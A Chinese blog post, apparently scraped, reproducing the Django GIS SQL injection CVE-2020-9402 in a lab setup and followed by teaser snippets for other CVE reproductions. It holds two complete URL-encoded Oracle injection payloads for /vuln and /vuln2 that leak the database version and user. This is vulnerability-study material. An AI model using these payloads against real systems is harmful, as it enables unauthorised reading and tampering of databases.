2. 程式人生 > 資料庫 >Django GIS SQL注入漏洞復現(CVE-2020-9402)

Django GIS SQL注入漏洞復現(CVE-2020-9402)

阿新 發佈:2020-11-27
漏洞概述:
Django是Django基金會的一套基於Python語言的開源Web應用框架。該框架包括面向物件的對映器、檢視系統、模板系統等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞。攻擊者可藉助特製的SQL語句利用該漏洞檢視、新增、修改或刪除資料庫中的資訊。
復現流程:
第一個注入漏洞在/vuln目錄下,直接訪問該目錄是無任何回顯的。此時直接對q傳參即可。payload如下: 
http://your-ip:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1

第二處漏洞在/vuln2目錄下,payload如下:

http://your-ip:8000/vuln2/?q=0.05)))%20FROM%20%22VULN_COLLECTION2%22%20%20where%20%20(select%20utl_inaddr.get_host_name((SELECT%20user%20FROM%20DUAL))%20from%20dual)%20is%20not%20null%20%20--
執行成功後會有相關sql語句回顯資訊。

相關推薦

Django GIS SQL注入漏洞復現CVE-2020-9402

漏洞概述: DjangoDjango基金會的一套基於Python語言的開源Web應用框架。該框架包括面向物件的對映器、檢視系統、模板系統等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x

vulhub漏洞復現-Django JSONField SQL注入漏洞復現 CVE-2019-14234

Django JSONField SQL注入漏洞復現 CVE-2019-14234 漏洞概述: Django通常搭配postgresql資料庫,而JSONField是該資料庫的一種資料型別。該漏洞的出現的原因在於Django中JSONField類的實現,Django的mode

Apache Log4j2 lookup JNDI 注入漏洞復現CVE-2021-44228

今年的末尾水一篇部落格 漏洞簡介 Apache Log4j 2 是Java語言的日誌處理套件,使用極為廣泛。在其2.0到2.14.1版本中存在一處JNDI注入漏洞,攻擊者在可以控制日誌內容的情況下,通過傳入類似於${jndi:ldap://evil

Apache Dubbo Provider預設反序列漏洞復現CVE-2020-1948

Apache Dubbo Provider預設反序列漏洞CVE-2020-1948 0x01 搭建漏洞環境 漏洞介紹 2020年06月23日, 360CERT監測發現Apache Dubbo 官方釋出了Apache Dubbo 遠端程式碼執行的風險通告,該漏洞編號為CVE-2020-1948,

F5 BIG-IP 遠端程式碼執行漏洞復現CVE-2020-5902

0x01 漏洞詳情 F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

CVE-2021-35042 Django order_by SQL注入 漏洞復現和分析

CVE-2021-35042 Django order_by SQL注入 漏洞復現和分析 目錄 CVE-2021-35042 Django order_by SQL注入 漏洞復現和分析

Jenkins-CI 遠端程式碼執行漏洞復現CVE-2017-1000353

0x01 環境 使用vulhub搭建漏洞環境 /vulhub-master/jenkins/CVE-2017-1000353 http://192.168.255.130:8080/

Apache Shiro反序列化漏洞復現CVE-2016-4437

0x00 Apache Shiro簡介 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

滲透測試--shiro-550漏洞復現CVE-2016-4437

漏洞概述 Apache Shiro 1.2.4及以前版本中,加密的使用者資訊序列化後儲存在名為remember-me的Cookie中。攻擊者可以使用Shiro的預設金鑰偽造使用者Cookie,觸發Java反序列化漏洞,進而在目標機器上執行任意命令。

Apache Solr 遠端命令執行漏洞復現CVE-2019-0193

一.漏洞介紹 Apache Solr 是一個開源的搜尋伺服器。Solr 使用 Java 語言開發,主要基於 HTTP 和 Apache Lucene 實現。此次漏洞出現在Apache Solr的DataImportHandler,該模組是一個可選但常用的模組,用於從資料庫

docker逃逸漏洞復現CVE-2019-5736

漏洞概述 2019年2月11日,runC的維護團隊報告了一個新發現的漏洞,SUSE Linux GmbH高階軟體工程師Aleksa Sarai公佈了影響Docker, containerd, Podman, CRI-O等預設執行時容器runc的嚴重漏洞CVE-2019-5736。漏洞會對

Apache log4j2-RCE 漏洞復現CVE-2021-44228

Apache log4j2-RCE 漏洞復現 0x01 漏洞簡介 Apache Log4j2是一個基於Java的日誌記錄工具。由於Apache Log4j2某些功能存在遞迴解析功能,攻擊者可直接構造惡意請求,觸發遠端程式碼執行漏洞漏洞利用無需特殊配置,

Linux Polkit本地許可權提升漏洞復現CVE-2021-4034

漏洞描述 Polkit 是用於在類 Unix 作業系統中控制系統範圍特權的元件。它為非特權程序提供了與特權程序進行通訊的有組織的方式。

S2-062_RCE漏洞復現CVE-2021-31805

一、漏洞描述 該漏洞是由於對S2-061(CVE-2020-17530的修復不完整,在Apache Struts 2.0.0-2.5.29版本範圍內,如果開發人員使用 %{xxx} 語法進行強制OGNL解析時,標籤的某些屬性仍然可被二次解析。當解析未經驗證的

CVE-2021-35042 Django SQL注入漏洞復現

搭建環境: git clone https://github.com/YouGina/CVE-2021-35042.gitcd CVE-2021-35042 再執行./setup.sh

永恆之黑CVE-2020-0796漏洞復現

北京時間3月12日,針對最新披露的SMB遠端程式碼執行漏洞(CVE-2020-0796,微軟官方釋出了針對Windows 10/Server禁用SMBv3SMB 3.1.1版本協議壓縮的安全指南公告,旨在緩解該漏洞所造成的威脅。隨即,騰訊安全網

sql server 遠端訪問informix_微軟 SQL Server 遠端程式碼執行漏洞CVE-2020-0618

技術標籤:sql server 遠端訪問informix 漏洞描述 近日,微軟釋出了2月安全更新公告,其中CVE-2020-0618 SQL Server 遠端命令執行漏洞在國記憶體在危害,SQL Server 在國內使用量大。

[CVE-2012-0392] Apache Struts 2遠端程式碼執行漏洞復現第五彈

棄之可惜 0x00 漏洞概述 編號為CVE-2012-0392。 即S2-008,實際上是多個漏洞的集合。

Apache Ofbiz xmlrpc RCE漏洞CVE-2020-9496復現

Apache Ofbiz xmlrpc RCE漏洞CVE-2020-9496復現 簡介 Apache OFBiz全稱是The ApacheOpen For Business Project,是開一個放的電子商務平臺,也是一個非常著名的開源專案

Webmin 命令執行漏洞 CVE-2020-35606--- 復現

漏洞繞過針對 採取的措施 CVE-2019-12840 並將其轉換為新向量。 供應商尚未修復此漏洞